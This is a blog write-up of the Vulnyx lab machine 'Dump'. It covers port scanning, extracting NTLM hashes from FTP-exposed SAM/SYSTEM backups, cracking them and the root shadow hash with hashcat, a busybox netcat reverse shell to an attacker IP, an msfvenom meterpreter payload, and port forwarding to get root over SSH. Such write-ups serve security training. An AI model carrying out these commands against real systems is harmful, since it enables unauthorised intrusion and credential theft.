Post

Dump - Vulnyx Writeup

Machine Info

Dump was an easy rated Linux machine on Vulnyx, Involves dumping user hashes from SAM file and cracking it those hashes using hashcat for initial access. For root access, user dumper have writes to read the /etc/shadow file, which leaks the root user password hash which leads to get access to root user on the box.

image

User

Scanning through Nmap

First of all we will go with nmap to scan the whole network and check for services running on the network. To scan the whole network and find all the open ports i use -p- used to scan the whole 65535 ports with –min-rate 10000 to scan network faster from nmap and i found a list of open ports on the network and get only the open ports using different terminal tools like cut, tr etc.

1
2
$ nmap -p- --min-rate 10000 192.168.190.134 -oN ini.txt && cat ini.txt | cut  -d ' ' -f1 | tr -d '/tcp' | tr '\n' ','
21,80, 4200

Now Let’s run the depth scan on these specific ports using

1
$ nmap -p21,80,4200 -sC -sV -A -T4 192.168.190.134 -oN scan.txt
  • -sC is to run all the default scripts
  • -sV for service and version detection
  • -A to check all default things
  • -T4 for aggressive scan
  • -oN to write the result into a specified file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      pyftpdlib 1.5.4
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.190.134:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx   2 root     root         4096 Feb 09 10:46 .backup [NSE: writeable]
80/tcp   open  http     Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
4200/tcp open  ssl/http ShellInABox
| ssl-cert: Subject: commonName=dump
| Not valid before: 2024-02-09T11:53:57
|_Not valid after:  2044-02-04T11:53:57
|_ssl-date: TLS randomness does not represent time
|_http-title: Shell In A Box

Through Nmap, we found three open ports, 21 FTP with anonymous login allowed, port 80 HTTP web and port 4200 ssl/HTTP also web. Becasue we are allowed to login as anonymous user on FTP, lets dive into it and check if we found any useful file or folder their.

21 FTP

After login to FTP using anonymous credientials, we found a .backup directory. after looking into the .backup directory, we found two files sam.bak and system.bak. So what are sam and system files, sam file is a file in windows that holds the usernames and NTLM password hashes of local users on system. This is file is encrypted and it’s key is stored in a registry file called system. You can learn more about it here

Pasted image 20240415093027

So in our case we have both system and sam file, lets try to dump the password hashes from it, we can use tool called secretsdump.py from impacket toolkit for that purpose SecretsDump.py is a Python tool by Impacket that can extract secrets from targets. SecretsDump.py performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) it tries to read as much as it can from the registry and then saves the hives in the target system (%SYSTEMROOT%\Temp dir) and reads the rest of the data from there. For NTDS.dit it uses the Volume Shadow Copy Service to read NTDS.dit directly from the disk or it can use the parser module to read NTDS.dit files from a copy. secretsdump.py dump usernames and their password hashes for us, if we were facing a windows machine, then we can perform pass-the-hash attack to gain access on the machine, without decrypting it. But, because we are on Linux machine, we have to decrypt it.

1
$ secretsdump.py -sam sam.bak -system system.bak LOCAL
  • -sam to parse sam file
  • -system to parse system file
  • LOCAL because we parse these files locally

Pasted image 20240415094024

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:45ab968b011c0b6cfd1e9e1b30ff40cc:916da1881680fcb38f2ce951f666d6be:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:d0d506281c0dbfe0a16f57e412411d37:::
dumper:1004:ebd1b59f4f5a6843aad3b435b51404ee:7324322d85d3714068d67eccee442365:::
admin:1005:7cc48b08335cd858aad3b435b51404ee:556a8f7773e850d4cf4d789d39ddaca0:::

After saving these hashes let’s fire up hashcat to perform dictionary attack to decrypt these hashes. Hashcat is a password cracking tool used for licit and illicit purposes. Hashat is a particularly fast, efficient, and versatile hacking tool that assists brute-force attacks by conducting them with hash values of passwords that the tool is guessing or applying

1
$ hashcat -m 1000 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
  • -m to specify module number of NTLM hash which is 1000 in our case

Pasted image 20240415095409

We were successfully able to crack the password of user admin and dumper

dumper:7324322d85d3714068d67eccee442365:1dumper
admin:556a8f7773e850d4cf4d789d39ddaca0:blabla

80 HTTP

On port 80 their is a simple apache default page is runnig. feroxbuster also didn’t found any useful path their.

Pasted image 20240415100300

4200 HTTPs

On TCP port 4200, there is a some kind of login page is working called dump login.

Pasted image 20240415095754

I tried to login to it using admin credentials but admin credentials didn’t worked their, then I tried to login using dumper credentials and it worked and we got a shell on the box as dumper user. Their is also our user flag is present.

Pasted image 20240415100118

Let’s get shell on our box using busybox and make it stable.

1
2
3
4
$ busybox nc 192.168.190.129 9001 -e sh
$ nc -lvnp 9001
$ ptyhon3 -c "import pty; pty.spawn('/bin/bash')"
$ export TERM=xterm

Privilege Escalation

Linpeas reveals that we have a read access to /etc/shadow file, a file that contains user’s passwords hashes on Linux system.

Pasted image 20240416102724

Lets, copy root hash and try to break it using hashcat on our local machine.

1
2
3
4
$ hashcat -m 1800 root-hash rockyou.txt

# Cracked Hash
$6$jzcdBmCLz0zF2.b/$6sok07AjDc3TN3oeI/NqrdZ6NSQly3ADW6lvs3z5q.5GDqsCypL8WtL7ARhzDcdYgukakXWeNbiIP7GyigCse/:shadow123

Linpease also discover that port 22 ssh was running locally on the machine. I decided to forward it to my attacker machine.

Pasted image 20240416103403

First, lets get a shell on metasploit and then perform port forwarding, there are also many other ways to perform port forwarding but the metasploit one is more simple and easy. To get a shell on metasploit, first create a elf file using msfvenom and then deliver it on victim machine using python3 server.

1
2
3
4
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.190.133 LPORT=4444 -f elf -o shel.elf

# Python server
$ python3 -m http.server 80

Pasted image 20240415103604

After that run a listener on metasploit using

1
2
3
4
5
$ use exploit/multi/handler
$ set payload linux/x64/meterpreter_reverse_tcp
$ set LHOST=<attacker IP>
$ set LPORT=<that you specified in msfvenom payload>
$ run

Now whenever someone will run our shel.elf file, we will receive a shell back on our metasploit listener.

Pasted image 20240415104043

Now Lets forward our port 22 to our attacker machine using:

1
$ portfwd -l 101 -p 22 -r 127.0.0.1
  • -l for local port
  • -p for remote port
  • -r remote host

Pasted image 20240416104103

Now let’s get a shell as root using ssh and grab our root.txt.

1
$ ssh root@127.0.0.1 -p 101

Pasted image 20240416104235

Happy Hacking ❤

This post is licensed under CC BY 4.0 by the author.